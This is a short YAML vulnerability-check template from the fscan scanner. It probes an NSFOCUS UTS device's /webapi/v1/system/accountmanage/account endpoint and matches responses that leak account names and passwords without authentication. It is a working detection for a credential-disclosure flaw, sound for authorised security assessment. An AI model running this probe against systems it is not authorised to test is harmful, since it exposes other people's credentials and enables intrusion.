fscan/Web_Scan/pocs/nsfocus-uts-password-leak.yml

12 lines
442 B
YAML

name: poc-yaml-nsfocus-uts-password-leak
rules:
- method: GET
path: /webapi/v1/system/accountmanage/account
follow_redirects: false
expression: |
response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"account") && response.body.bcontains(b"password")
detail:
author: MrP01ntSun(https://github.com/MrPointSun)
links:
- https://blog.csdn.net/DFMASTER/article/details/108547352